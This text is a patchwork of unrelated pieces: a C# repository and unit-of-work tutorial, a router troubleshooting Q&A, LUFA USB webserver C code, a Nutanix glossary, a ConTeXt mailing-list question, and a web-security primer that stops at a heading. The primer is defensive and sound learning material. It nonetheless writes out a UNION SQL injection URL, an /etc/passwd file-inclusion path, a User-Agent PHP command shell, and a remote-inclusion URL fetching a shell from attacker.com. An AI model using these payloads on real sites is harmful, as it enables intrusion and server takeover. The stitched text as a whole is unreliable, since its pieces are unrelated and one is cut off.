// This interface will give define a contract for CRUD operations on // Books entity interface IBooksRepository { List<Book> GetAllBooks(); Book GetBookById(int id); void AddBook(Book book); void UpdateBook(int id, Book book); void DeleteBook(Book book); void Save(); } And the implementation of this class will contain the actual logic to perform the CRUD operations on the Books table. public class BooksRepository : IBooksRepository, IDisposable { SampleDatabaseEntities entities = new SampleDatabaseEntities(); #region IBooksRepository Members BooksRepository() { entities = new SampleDatabaseEntities(); } public List<Book> GetAllBooks() { return entities.Books.ToList(); } public Book GetBookById(int id) { return entities.Books.SingleOrDefault(book => book.ID == id); } public void AddBook(Book book) { entities.Books.AddObject(book); } public void UpdateBook(int id, Book book) { Book b = GetBookById(id); b = book; } public void DeleteBook(Book book) { entities.Books.DeleteObject(book); } public void Save() { entities.SaveChanges(); } #endregion #region IDisposable Members public void Dispose() { Dispose(true); GC.SuppressFinalize(this); } protected virtual void Dispose(bool disposing) { if (disposing == true) { entities = null; } } ~BooksRepository() { Dispose(false); } #endregion } Now let us create a simple Controller in which we will have the reference to this class being used perform the CRUD operations on Books table. public class BooksController : Controller { private IBooksRepository booksRepository = null; public BooksController() :this(new BooksRepository()) { } public BooksController(IBooksRepository bookRepo) { this.booksRepository = bookRepo; } public ActionResult Index() { List<Book> books = booksRepository.GetAllBooks(); return View(books); } } Now here in this above code when the application runs the default parameter-less constructor will run which will create a BooksRepository object and it will be used in the class. The result of which is that the application will be able to work with actual data from the database. Now from our test project we will call the parameterized constructor with an object of the dummy class containing dummy data. The benefit of which is that we should be able to test and verify the controller classes using the dummy data. Lets run the application to see the output   Note: We will not be doing other CRUD operations here because they can be done on same lines very easily. Lets try to visualize this version of implementation   Having Multiple Repositories Now imagine the scenario where we have multiple tables in the database. Then we need to create multiple repositories in order to map the domain model to the data model. Now having multiple repository classes poses on problem. The problem is regarding the ObjectContext object. If we create multiple repositories, should they contain their ObjectContext separately? We know that using multiple instances of ObjectContext object simultaneously can be a problem so should we really allow each repository to contain their own instances? To solve this problem. Why to let each Repository class instance have its own instance of the ObjectContext. Why not create the instance of ObjectContext in some central location and then pass this instance to the repository classes whenever they are being instantiated. Now this new class will be called as UnitOfWork and this class will be responsible for creating the ObjectContext nstance and handing over all the repository instances to the controllers. 
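Before moving on, here is what the dummy-data implementation mentioned above might look like. This is an illustration rather than code from the article; only the IBooksRepository members and Book.ID come from the text, and the class name is hypothetical.

using System.Collections.Generic;
using System.Linq;

public class FakeBooksRepository : IBooksRepository
{
    // In-memory list standing in for the database
    private List<Book> books = new List<Book>();

    public List<Book> GetAllBooks() { return books; }

    public Book GetBookById(int id)
    {
        return books.SingleOrDefault(b => b.ID == id);
    }

    public void AddBook(Book book) { books.Add(book); }

    public void UpdateBook(int id, Book book)
    {
        DeleteBook(GetBookById(id));
        books.Add(book);
    }

    public void DeleteBook(Book book) { books.Remove(book); }

    public void Save() { /* nothing to flush in memory */ }
}

A test can then construct new BooksController(new FakeBooksRepository()) and assert against the model of the returned ViewResult without ever touching SampleDatabaseEntities.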
Unit Of Work So let us create a separate Repository to which will be used via UnitOfWork class and the ObjectContext will be passed to this class from outside. public class BooksRepositoryEn { SampleDatabaseEntities entities = null; public BooksRepositoryEn(SampleDatabaseEntities entities) { this.entities = entities; } public List<Book> GetAllBooks() { return entities.Books.ToList(); } public Book GetBookById(int id) { return entities.Books.SingleOrDefault(book => book.ID == id); } public void AddBook(Book book) { entities.Books.AddObject(book); } public void UpdateBook(int id, Book book) { Book b = GetBookById(id); b = book; } public void DeleteBook(Book book) { entities.Books.DeleteObject(book); } public void Save() { entities.SaveChanges(); } } Now this Repository class is taking the ObjectContext object from outside(whenever it is being created). Also, we don't need to implement IDisposable here because this class is not creating the instance and so its not this class's responsibility to dispose it. Now if we have to create multiple repositories, we can simply have all the repositories take the ObjectContext object at the time of construction. Now let us see how the UnitOfWork class creates the repository and passes it on to the Controller. public class UnitOfWork : IDisposable { private SampleDatabaseEntities entities = null; // This will be called from controller default constructor public UnitOfWork() { entities = new SampleDatabaseEntities(); BooksRepository = new BooksRepositoryEn(entities); } // This will be created from test project and passed on to the // controllers parameterized constructors public UnitOfWork(IBooksRepository booksRepo) { BooksRepository = booksRepo; } public IBooksRepository BooksRepository { get; private set; } #region IDisposable Members public void Dispose() { Dispose(true); GC.SuppressFinalize(this); } protected virtual void Dispose(bool disposing) { if (disposing == true) { entities = null; } } ~UnitOfWork() { Dispose(false); } #endregion } Now we have a parameter-less constructor which will be called from controller default constructor i.e. whenever our page runs. We also have a parameterized constructor which will be created from test project and passed on to the controllers parameterized constructors. The dispose pattern is now implemented by the UnitOfWork class because now it is responsible for creating the ObjectContext so it should be the one disposing it. Let us look at the implementation of the Controller class now. public class BookEnController : Controller { private UnitOfWork unitOfWork = null; public BookEnController() : this(new UnitOfWork()) { } public BookEnController(UnitOfWork uow) { this.unitOfWork = uow; } public ActionResult Index() { List<Book> books = unitOfWork.BooksRepository.GetAllBooks(); return View(books); } } Now the test-ablity of this controller is still maintained by having the combination of default and parameterized constructor. Also, the data access code is now centralized in one place with the possibility of having multiple repository classes being instantiated at the same time. Let us run the application. Note: We will not be doing other CRUD operations here because they can be done on same lines very easily. And finally let us visualize our implementation with Unit of Work in place.   Point of interest In this article we saw what is Repository and Unit of work pattern. We have also seen a rudimentary implementation for the same in an ASP.NET MVC application. 
The next step to the project would be to convert all the repository classes into one generic repository so that we don't need to create multiple repository classes.

I hope this has been informative.

History

• 12 April 2013: First version.

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL).
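As a parting sketch of that generic-repository "next step" (my illustration, not the article's code, built on the EF4 ObjectContext API):

using System.Collections.Generic;
using System.Data.Objects;
using System.Linq;

public class GenericRepository<TEntity> where TEntity : class
{
    private readonly ObjectSet<TEntity> objectSet;

    public GenericRepository(SampleDatabaseEntities entities)
    {
        // CreateObjectSet resolves the entity set for any mapped entity type
        objectSet = entities.CreateObjectSet<TEntity>();
    }

    public List<TEntity> GetAll() { return objectSet.ToList(); }
    public void Add(TEntity entity) { objectSet.AddObject(entity); }
    public void Delete(TEntity entity) { objectSet.DeleteObject(entity); }
}

With this in place, the UnitOfWork can expose one GenericRepository<Book> property (and one per additional entity type) instead of a hand-written repository class per table.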
How to Troubleshoot a NETGEAR Nighthawk Router?

Hello guys. I have a NETGEAR Nighthawk router, but I'm facing a problem while connecting to my home network. Can anybody help me troubleshoot my NETGEAR Nighthawk router?

If you are able to access your Nighthawk router but you fail to get access to the internet, check whether the router has acquired an IP address from your ISP. You can see whether the request succeeded on the status screen of your router. These are the steps to follow.

Check the Wide Area Network IP address:

• Launch your web browser and try to go to an external website.
• Go to the main router page by typing www.routerlogin.net in the URL section.
• Go to Administration and then Router Settings.
• Check whether there is an IP address. If you see 0.0.0.0, that means the router did not acquire an IP address from your internet service provider.

If you are not able to acquire an IP address from your internet service provider, you may have to start a new network so that your DSL modem can recognise it. There can be several reasons why you are not able to obtain an IP address from your ISP. It can be one of the problems mentioned below:

1. There is a chance that your service provider requires a login process. Ask your internet service provider whether they need PPPoE or some other kind of login.
2. If a login is required, the username or password may have been set incorrectly.
3. Your ISP may ask for the host name of your computer. In that case, go to the setup screen and assign the system host name.
4. There is a high possibility that your ISP allows only one MAC address on the network and is checking for that MAC address. In such a case, you can do one of two things:
   1. Tell your internet service provider that you have purchased a new device, and ask them to use the MAC address of your router.
   2. Set up your router to use (clone) the MAC address of your computer.
/*
             LUFA Library
     Copyright (C) Dean Camera, 2010.

  dean [at] fourwalledcubicle [dot] com
      www.fourwalledcubicle.com
*/

/*
  Copyright 2010  Dean Camera (dean [at] fourwalledcubicle [dot] com)

  Permission to use, copy, modify, distribute, and sell this
  software and its documentation for any purpose is hereby granted
  without fee, provided that the above copyright notice appear in
  all copies and that both that the copyright notice and this
  permission notice and warranty disclaimer appear in supporting
  documentation, and that the name of the author not be used in
  advertising or publicity pertaining to distribution of the
  software without specific, written prior permission.

  The author disclaims all warranties with regard to this
  software, including all implied warranties of merchantability
  and fitness. In no event shall the author be liable for any
  special, indirect or consequential damages or any damages
  whatsoever resulting from loss of use, data or profits, whether
  in an action of contract, negligence or other tortious action,
  arising out of or in connection with the use or performance of
  this software.
*/

/** \file
 *
 *  Main source file for the Webserver project. This file contains the main tasks of
 *  the demo and is responsible for the initial application hardware configuration.
 */

#include "Webserver.h"

/** LUFA RNDIS Class driver interface configuration and state information. This structure is
 *  passed to all RNDIS Class driver functions, so that multiple instances of the same class
 *  within a device can be differentiated from one another.
 */
USB_ClassInfo_RNDIS_Host_t Ethernet_RNDIS_Interface =
    {
        .Config =
            {
                .DataINPipeNumber           = 1,
                .DataINPipeDoubleBank       = false,

                .DataOUTPipeNumber          = 2,
                .DataOUTPipeDoubleBank      = false,

                .NotificationPipeNumber     = 3,
                .NotificationPipeDoubleBank = false,

                .HostMaxPacketSize          = UIP_CONF_BUFFER_SIZE,
            },
    };

struct timer ConnectionTimer, ARPTimer;
uint16_t MillisecondTickCount;

/** ISR for the management of the connection management timeout counter */
ISR(TIMER0_COMPA_vect, ISR_BLOCK)
{
    MillisecondTickCount++;
}

void TCPCallback(void)
{
    printf("Callback!\r\n");
}

/** Main program entry point. This routine configures the hardware required by the application, then
 *  enters a loop to run the application tasks in sequence.
 */
int main(void)
{
    SetupHardware();

    puts_P(PSTR(ESC_FG_CYAN "RNDIS Host Demo running.\r\n" ESC_FG_WHITE));

    LEDs_SetAllLEDs(LEDMASK_USB_NOTREADY);

    for (;;)
    {
        switch (USB_HostState)
        {
            case HOST_STATE_Addressed:
                LEDs_SetAllLEDs(LEDMASK_USB_ENUMERATING);

                uint16_t ConfigDescriptorSize;
                uint8_t  ConfigDescriptorData[512];

                if (USB_Host_GetDeviceConfigDescriptor(1, &ConfigDescriptorSize, ConfigDescriptorData,
                                                       sizeof(ConfigDescriptorData)) != HOST_GETCONFIG_Successful)
                {
                    printf("Error Retrieving Configuration Descriptor.\r\n");
                    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
                    USB_HostState = HOST_STATE_WaitForDeviceRemoval;
                    break;
                }

                if (RNDIS_Host_ConfigurePipes(&Ethernet_RNDIS_Interface,
                                              ConfigDescriptorSize, ConfigDescriptorData) != RNDIS_ENUMERROR_NoError)
                {
                    printf("Attached Device Not a Valid RNDIS Class Device.\r\n");
                    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
                    USB_HostState = HOST_STATE_WaitForDeviceRemoval;
                    break;
                }

                if (USB_Host_SetDeviceConfiguration(1) != HOST_SENDCONTROL_Successful)
                {
                    printf("Error Setting Device Configuration.\r\n");
                    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
                    USB_HostState = HOST_STATE_WaitForDeviceRemoval;
                    break;
                }

                if (RNDIS_Host_InitializeDevice(&Ethernet_RNDIS_Interface) != HOST_SENDCONTROL_Successful)
                {
                    printf("Error Initializing Device.\r\n");
                    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
                    USB_HostState = HOST_STATE_WaitForDeviceRemoval;
                    break;
                }

                printf("Device Max Transfer Size: %lu bytes.\r\n", Ethernet_RNDIS_Interface.State.DeviceMaxPacketSize);

                uint32_t PacketFilter = (REMOTE_NDIS_PACKET_DIRECTED | REMOTE_NDIS_PACKET_BROADCAST | REMOTE_NDIS_PACKET_ALL_MULTICAST);
                if (RNDIS_Host_SetRNDISProperty(&Ethernet_RNDIS_Interface, OID_GEN_CURRENT_PACKET_FILTER,
                                                &PacketFilter, sizeof(PacketFilter)) != HOST_SENDCONTROL_Successful)
                {
                    printf("Error Setting Device Packet Filter.\r\n");
                    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
                    USB_HostState = HOST_STATE_WaitForDeviceRemoval;
                    break;
                }

                struct uip_eth_addr MACAddress;
                if (RNDIS_Host_QueryRNDISProperty(&Ethernet_RNDIS_Interface, OID_802_3_CURRENT_ADDRESS,
                                                  &MACAddress, sizeof(MACAddress)) != HOST_SENDCONTROL_Successful)
                {
                    printf("Error Getting MAC Address.\r\n");
                    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
                    USB_HostState = HOST_STATE_WaitForDeviceRemoval;
                    break;
                }

                printf("MAC Address: 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X\r\n",
                       MACAddress.addr[0], MACAddress.addr[1], MACAddress.addr[2],
                       MACAddress.addr[3], MACAddress.addr[4], MACAddress.addr[5]);

                uip_setethaddr(MACAddress);

                printf("RNDIS Device Enumerated.\r\n");
                USB_HostState = HOST_STATE_Configured;
                break;
            case HOST_STATE_Configured:
                ProcessIncommingPacket();
                ManageConnections();
                break;
        }

        RNDIS_Host_USBTask(&Ethernet_RNDIS_Interface);
        USB_USBTask();
    }
}

void ProcessIncommingPacket(void)
{
    if (RNDIS_Host_IsPacketReceived(&Ethernet_RNDIS_Interface))
    {
        LEDs_SetAllLEDs(LEDMASK_USB_BUSY);

        /* Read the incoming packet straight into the UIP packet buffer */
        RNDIS_Host_ReadPacket(&Ethernet_RNDIS_Interface, uip_buf, &uip_len);

        printf("RECEIVED PACKET (%d):\r\n", uip_len);
        for (uint16_t i = 0; i < uip_len; i++)
          printf("0x%02X ", uip_buf[i]);
        printf("\r\n\r\n");

        struct uip_eth_hdr* EthernetHeader = (struct uip_eth_hdr*)&uip_buf[0];
        if (EthernetHeader->type == HTONS(UIP_ETHTYPE_IP))
        {
            /* Filter packet by MAC destination */
            uip_arp_ipin();

            /* Process incoming packet */
            uip_input();

            /* Add destination MAC to outgoing packet */
            if (uip_len > 0)
              uip_arp_out();
        }
        else if (EthernetHeader->type == HTONS(UIP_ETHTYPE_ARP))
        {
            /* Process ARP packet */
            uip_arp_arpin();
        }

        /* If a response was generated, send it */
        if (uip_len > 0)
        {
            RNDIS_Host_SendPacket(&Ethernet_RNDIS_Interface, uip_buf, uip_len);

            printf("SENT PACKET (%d):\r\n", uip_len);
            for (uint16_t i = 0; i < uip_len; i++)
              printf("0x%02X ", uip_buf[i]);
            printf("\r\n\r\n");
        }

        LEDs_SetAllLEDs(LEDMASK_USB_READY);
    }
}

void ManageConnections(void)
{
    /* Manage open connections */
    if (timer_expired(&ConnectionTimer))
    {
        timer_reset(&ConnectionTimer);

        LEDs_SetAllLEDs(LEDMASK_USB_BUSY);

        for (uint8_t i = 0; i < UIP_CONNS; i++)
        {
            /* Run periodic connection management for each connection */
            uip_periodic(i);

            /* If a response was generated, send it */
            if (uip_len > 0)
              RNDIS_Host_SendPacket(&Ethernet_RNDIS_Interface, uip_buf, uip_len);
        }

        LEDs_SetAllLEDs(LEDMASK_USB_READY);
    }

    /* Manage ARP cache refreshing */
    if (timer_expired(&ARPTimer))
    {
        timer_reset(&ARPTimer);
        uip_arp_timer();
    }
}

/** Configures the board hardware and chip peripherals for the demo's functionality. */
void SetupHardware(void)
{
    /* Disable watchdog if enabled by bootloader/fuses */
    MCUSR &= ~(1 << WDRF);
    wdt_disable();

    /* Disable clock division */
    clock_prescale_set(clock_div_1);

    /* Hardware Initialization */
    SerialStream_Init(9600, false);
    LEDs_Init();
    USB_Init();

    /* uIP Timing Initialization */
    clock_init();
    timer_set(&ConnectionTimer, CLOCK_SECOND / 2);
    timer_set(&ARPTimer, CLOCK_SECOND * 10);

    /* uIP Stack Initialization */
    uip_init();

    uip_ipaddr_t IPAddress, Netmask, GatewayIPAddress;
    uip_ipaddr(&IPAddress, 192, 168, 1, 10);
    uip_ipaddr(&Netmask, 255, 255, 255, 0);
    uip_ipaddr(&GatewayIPAddress, 192, 168, 1, 1);
    uip_sethostaddr(&IPAddress);
    uip_setnetmask(&Netmask);
    uip_setdraddr(&GatewayIPAddress);

    /* HTTP Webserver Initialization */
    uip_listen(HTONS(80));
}

/** Event handler for the USB_DeviceAttached event. This indicates that a device has been attached to the host, and
 *  starts the library USB task to begin the enumeration and USB management process.
 */
void EVENT_USB_Host_DeviceAttached(void)
{
    puts_P(PSTR("Device Attached.\r\n"));
    LEDs_SetAllLEDs(LEDMASK_USB_ENUMERATING);
}

/** Event handler for the USB_DeviceUnattached event. This indicates that a device has been removed from the host, and
 *  stops the library USB task management process.
 */
void EVENT_USB_Host_DeviceUnattached(void)
{
    puts_P(PSTR("\r\nDevice Unattached.\r\n"));
    LEDs_SetAllLEDs(LEDMASK_USB_NOTREADY);
}

/** Event handler for the USB_DeviceEnumerationComplete event. This indicates that a device has been successfully
 *  enumerated by the host and is now ready to be used by the application.
 */
void EVENT_USB_Host_DeviceEnumerationComplete(void)
{
    LEDs_SetAllLEDs(LEDMASK_USB_READY);
}

/** Event handler for the USB_HostError event. This indicates that a hardware error occurred while in host mode. */
void EVENT_USB_Host_HostError(const uint8_t ErrorCode)
{
    USB_ShutDown();

    printf_P(PSTR(ESC_FG_RED "Host Mode Error\r\n"
                             " -- Error Code %d\r\n" ESC_FG_WHITE), ErrorCode);

    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
    for(;;);
}

/** Event handler for the USB_DeviceEnumerationFailed event. This indicates that a problem occurred while
 *  enumerating an attached USB device.
 */
void EVENT_USB_Host_DeviceEnumerationFailed(const uint8_t ErrorCode, const uint8_t SubErrorCode)
{
    printf_P(PSTR(ESC_FG_RED "Dev Enum Error\r\n"
                             " -- Error Code %d\r\n"
                             " -- Sub Error Code %d\r\n"
                             " -- In State %d\r\n" ESC_FG_WHITE),
             ErrorCode, SubErrorCode, USB_HostState);

    LEDs_SetAllLEDs(LEDMASK_USB_ERROR);
}
Nutanix Components – Part 2

In this article, I will explain the Nutanix hardware components, the difference between logical and physical datastores, and a group of terms used in Nutanix technology.

Nutanix Hardware Components & Terminology

1. Nutanix Node
The foundational unit of the cluster is the Nutanix node. Each node in the cluster is a standard x86 server that runs an industry-standard hypervisor and contains a Nutanix Controller VM, processors, memory, and local storage composed of both low-latency SSDs and economical HDDs. Nodes work together across a 10GbE network to form a Nutanix cluster and a distributed platform called the Acropolis Distributed Storage Fabric, or DSF.

2. Nutanix Block
A Nutanix block is a bundled hardware and software appliance that houses up to four nodes in a 2U footprint. All of the nodes in a block share power and fan resources.

3. Nutanix Cluster
A Nutanix cluster is a group of Nutanix nodes and blocks that can easily scale into hundreds or thousands of nodes across many physical blocks with virtually no performance loss. A cluster must contain a minimum of three nodes to operate.

4. Storage Tiers
Storage tiers use MapReduce tiering technology to ensure that data is intelligently placed in the optimal storage tier (flash or HDD) to yield the fastest possible performance.

5. Storage Pool
A STORAGE POOL is a group of physical storage devices, including SSD and HDD devices, for the cluster. The storage pool can span multiple Nutanix nodes and is expanded as the cluster scales.

6. Container
A CONTAINER is a logical segmentation of the storage pool and contains a group of VMs or files (vDisks). Containers are usually mapped to hosts as shared storage in the form of an NFS datastore or an SMB share.

7. vDisk
A vDisk is a subset of available storage within a container that provides storage to virtual machines. If the container is mounted as an NFS volume, then the creation and management of vDisks within that container is handled automatically by the cluster.

8. Datastore
A DATASTORE is a logical container for files necessary for VM operations.

Thanks for reading!
[NTG-context] Simple question

Gerben Wierda gerben.wierda at rna.nl
Tue May 10 00:15:30 CEST 2022

What is the easiest way to have a 'database' of translations for strings and maybe links? I now have 4 languages and 2 versions, so 8 documents, but I'd like to have all translatable strings together so I can maintain them in a single file.

Ideally, I can create a file where the key of each translation is one language (say English) and the translations are part of that. Something I can call like this:

  \translatephrase[English phrase][nl]
  \translatelocation[../LMTX-Output/without-ids/en/file.pdf][nl][simple]

and where I can maintain all the translations a bit like this:

  \translationentry[English phrase]{
    \definetranslatephrase[nl][Nederlandse frase]
    \definetranslatephrase[fr][Phrase française]
  }

  \translatelocation[../LMTX-Output/without-ids/en/file.pdf][simple][nl][../LMTX-Output/without-ids/nl/file-simple.pdf]
  \translatelocation[../LMTX-Output/without-ids/en/file.pdf][none][nl][../LMTX-Output/without-ids/nl/file.pdf]

Here, the \translatelocation command could be used inside an \externalfigure command, and \translatephrase could be used as text.

In the end I'd like to compile with

  context language=fr mode=simple mainfile.tex

Doable?

Gerben Wierda (LinkedIn <https://www.linkedin.com/in/gerbenwierda>)
R&A IT Strategy <https://ea.rna.nl/> (main site)
Book: Chess and the Art of Enterprise Architecture <https://ea.rna.nl/the-book/>
Book: Mastering ArchiMate <https://ea.rna.nl/the-book-edition-iii/>
Web Application Security Basics

With the development of computers and communication technologies, the question of security is becoming more and more pressing. In this article we will attempt to summarize the most common vulnerabilities in Web applications and the ways to secure them.

Some History

With the development of computers and communication technologies, the question of computer security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for companies – you cannot do business if you do not use the Internet and/or web-based solutions: ERP applications, collaboration tools, you name it. This raises many questions, such as "How secure is the information of my company?"; "How secure is the information of my customers?"; "Can someone access this information without authorization?"; "What do I need to do to protect myself from getting hacked?", and so on.

These questions are more relevant today than they were in the past. Twenty years ago, very few people used computers, and even fewer dealt with information security. For those that did, this was either a hobby or a profession, and they had a different way of thinking – if they found a vulnerability in some software or system, they would report it to the owners so that they could fix or mitigate it. I remember, in the 90's, there was a guy who hacked the name server of our university network through the finger daemon, and reported it immediately without doing any harm.

Now, when literally everyone has Internet access, things are quite different. Anyone can download working exploits for recently published vulnerabilities; there are tools that can automate most of the tasks you would go through to hack a website; and do not forget Google and Shodan, which you can use to find vulnerable targets. This makes "hacking" (if we use the term loosely) very easy.

Why does Web application security matter?

Under these circumstances, it is not hard to answer this question. Since virtually anyone has access to "hacking resources", the threat to information security has increased enormously. With the migration to Web applications, combined with the hype around cloud computing, the focus of security specialists and researchers has shifted. On one hand, it is harder to find a remote exploit for an operating system. On the other hand, it is much easier to target and compromise a Web application. Often, the only thing you need for that is a Web browser – take LFI, RFI, File Upload, or SQLi. If the application is vulnerable to LFI, you can include the process environment file, which will be parsed by the PHP interpreter. Then, if you change the User-Agent to PHP code, it will be executed, giving you remote command execution. If there is an RFI, you can include a Web shell from a remote server, and so on. Additionally, vulnerabilities are announced publicly, sometimes even before there is a patch for them.

Yeah, but why on earth would someone attack my company?

The motivation of an attacker can vary: industrial espionage; getting a stepping stone (hopping station) for carrying out attacks on other machines and networks; real or imaginary profit; revenge; hacktivism; and so on. Anyone can target any company, even for no particular reason.

So what could be the damage?

No matter the motivation of the attacker, their actions can cause huge financial losses, loss of reputation and trust, and lawsuits.
If a server is hacked and used as a hopping station to target other networks, it may be confiscated by law enforcement, which can lead to additional losses. If its content is deleted, this can directly affect productivity. A compromise of a server can also lead to attacks on the internal networks of the company. That is why we need to know:

The Most Common Vulnerabilities in Web Applications

The Open Web Application Security Project (OWASP) defines ten categories, which combine "the most serious risks for a broad array of organizations." Below, we will outline some of the most common vulnerabilities we have met in the course of our work. Probably the most common, and the easiest one to exploit, is:

SQL Injection – Exploiting the Developer

Almost every dynamic Web application uses some kind of database back-end. The content displayed to the application users is stored in the database and displayed in the browser, depending on the parameters passed by the underlying scripts to the back-end database. These parameters, however, depend on user behavior and can therefore be modified by the user. This is basic functionality of any Web application. The problems arise when the parameters are passed to the database without any sanitizing. This allows malicious users to close a legitimate query and pass their own queries to the database, getting the results one way or another. In other words, SQL Injection exploits the assumptions made by the application developers.

For example, when the developer uses the following code:

  $sql = 'SELECT * FROM products WHERE id = ' . $_GET['id'];

they want the script to query the database for products matching a given ID that is passed as a GET parameter. That is, if a visitor accesses http://target.com/vulnerable_script.php?id=1, they will see the details for the product with ID 1. The database query will look like this:

  SELECT * FROM products WHERE id = 1

In this particular case, the developer assumes that the 'id' parameter will always be an integer. However, since the value of the 'id' parameter is passed to the database without any filtering, a malicious user can input the following URL in the browser:

  http://target.com/vulnerable_script.php?id=1+union+select+0,1,concat_ws(0x3A,user(),database(),version()),3,4,5,6--

In this case, the DB query will look like this:

  SELECT * FROM products WHERE id = 1 union all select 0,1,concat_ws(0x3A,user(),database(),version()),3,4,5,6

Basically, this tells the database to display the information about the product with ID 1 and combine it with a set of data that contains the database user, the name of the database, and the version of the database server. This information is selected in the third column, separated by colons (0x3A). To make this query, the attacker needs to know the number of columns in the original query. This information can be easily obtained with several requests that instruct the database to display the data ordered by a particular column – for example, appending order by 7-- to the id parameter and lowering the number until the error disappears reveals the column count.

This is a basic example of a regular Union SQL Injection. There are other flavors of SQLi – error-based, time-based blind, boolean-based blind. Error-based SQL Injection attacks rely on extracting information from the errors returned by the database. There is a nice introductory tutorial on error-based SQLi on YouTube. Surprisingly often, developers think that when they hide the errors from the output, they have resolved the vulnerability.
Of course, this is not the case – the fact that you cannot see the data returned by the database (union-based) or the errors (error-based) does not mean that the script is not vulnerable. In such cases, an attacker can use Blind SQL Injection to exfiltrate data, i.e., brute-force the data based on boolean or time-based conditions. The attacker passes queries, inspects the responses of the server, and reconstructs the data from them.

Of course, attackers and pentesters are not stuck with the browser to exploit these vulnerabilities. There are numerous tools that automate the process. The best one is sqlmap; Bernardo and Miroslav have done an amazing job developing this tool.

There are several things that can be done to prevent SQL Injection. The most widely used method is:

Filtering the user input

This method is the easiest to implement but, if not implemented properly, it can be bypassed. There are numerous techniques to bypass defenses based on input filtering: case tampering, white-space tampering, and encoding the queries.

A much better defense against SQLi is to use parameterized queries, or "prepared statements"

These are essentially templates for SQL queries that contain placeholders where the user input will go. When the filled-in template is passed to the database, the entire user input ends up in the placeholder allocated for it. The database executes the query from the template, never any query fragments that may be supplied in the user input.

Alternatively, developers can use ORM (Object Relational Mapping)

This is a technique that maps the tables in the database to objects in the application, creating a virtual database. In practice, ORM systems generate parameterized queries under the hood.
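To make this concrete, here is a minimal sketch of the products lookup from the SQL Injection example, rewritten with a prepared statement. This PDO code is illustrative, not from the original application; the connection parameters are placeholders.

  <?php
  // Hypothetical PDO connection; host, database and credentials are placeholders.
  $pdo = new PDO('mysql:host=localhost;dbname=shop', 'user', 'pass');
  $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

  // The query template contains a placeholder instead of the raw input.
  $stmt = $pdo->prepare('SELECT * FROM products WHERE id = :id');

  // The user input is bound to the placeholder; whatever it contains,
  // it can never close the query and inject additional SQL.
  $stmt->bindValue(':id', $_GET['id'], PDO::PARAM_INT);
  $stmt->execute();

  $product = $stmt->fetch(PDO::FETCH_ASSOC);
  ?>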
The second most common vulnerability in Web applications is:

File Inclusion – Exploiting the Functionality

This is another vulnerability that is fairly easy to find and exploit. Essentially, this is the ability to include files from the machine on which the application runs (Local File Inclusion, LFI), or from a remote server visible to this machine (Remote File Inclusion, RFI). The possibility to include different scripts is essential for the work of every application – this is how the application logic is abstracted, and how different pages are displayed depending on the user's choice.

Let's take a fairly simple website that has four pages: Home, News, About Us, Contacts. If a visitor accesses the Home page, the URL they will use looks like this:

  http://target.com/vulnerable_script.php?page=home

In other words, the script accepts one parameter (page), whose value specifies the page requested by the visitor. Let's assume that the script has the following code:

  <?php
  $page = $_GET['page'];
  if(isset($page)) {
      include("$page");
  } else {
      include("vulnerable_script.php");
  }
  ?>

The code is self-explanatory – the value of the GET parameter page is assigned to the variable $page. If its value is not NULL, the script includes the file with that name. The problem with this code is that the $page variable is created from the user input without any checks or filtering. Therefore, if we access the following URL:

  http://target.com/vulnerable_script.php?page=../../../../etc/passwd

the script will include and display the contents of the UNIX password file. This is a very simplified example of LFI.

Often, programmers think that to secure the script above, they only need to add one little modification:

  <?php
  $page = $_GET['page'];
  if(isset($page)) {
      include("$page" . ".html");
  } else {
      include("vulnerable_script.php");
  }
  ?>

The only difference here is that a .html extension is appended to the page that is included. However, by simply appending a null character (%00) to the URL, the attacker would still be able to include arbitrary files. (This depends on the server configuration and the PHP version, and may not work in all cases.) In other cases, developers use the file_exists() function, but this is a functionality check, not a security one, because it does not limit the ability to include existing files.

LFI vulnerabilities can easily lead to command execution in some cases. To achieve this, a malicious user can use the /proc file system, which is used in Linux as an interface to the kernel of the Operating System. Let's say that, again, we have a script that is vulnerable to LFI. To gain the ability to execute commands on the server, a malicious user can include /proc/self/environ. This is the environment of the current process – it contains the environment variables for the running process. Besides the system environment variables, it also contains the CGI variables (REMOTE_ADDR, HTTP_REFERER, HTTP_USER_AGENT, etc.). So, if the attacker changes the User-Agent header passed to the server to a PHP script (for example, a short payload such as <?php system($_GET['cmd']); ?>), it will be parsed by the PHP interpreter and executed on the server.

So far, we've looked into the ability to include files locally from the server on which the vulnerable script is running. Including files from remote locations is not that different. Actually, if the server configuration allows the inclusion of remote scripts, and if the script is vulnerable, the only difference will be in the URL – the attacker just has to use an address such as:

  http://target.com/vulnerable_script.php?page=http://attacker.com/php_shell.txt%00

The file php_shell.txt will be included by the vulnerable script, parsed by the interpreter, and executed locally on the server, effectively giving the attacker Web shell access to the machine.

Much like the SQL Injection vulnerabilities, the File Inclusion vulnerabilities are fairly easy to find and exploit. They, too, are a result of bad programming.
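One common fix is to whitelist the pages that may be included, so that raw user input never reaches include(). A minimal sketch, assuming the four-page site from the example (the file names are illustrative):

  <?php
  // Hypothetical whitelist of includable pages.
  $pages = array(
      'home'     => 'home.php',
      'news'     => 'news.php',
      'about'    => 'about.php',
      'contacts' => 'contacts.php',
  );

  $page = isset($_GET['page']) ? $_GET['page'] : 'home';

  // Unknown values fall back to the default page; the raw user
  // input is never passed to include().
  if (!array_key_exists($page, $pages)) {
      $page = 'home';
  }

  include $pages[$page];
  ?>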
Another such result of bad programming is:

Arbitrary File Upload – Exploiting the Hospitality

We have previously posted about this type of vulnerability, so we are going to skip it here. The truth is that it is not just media upload forms that can be exploited. Any file upload script can be used. There may not even be an HTML form; the attackers can just make a request directly to the script.

Even if we have a secure application, we should always be watching for:

Unprotected Files – Exploiting the Negligence

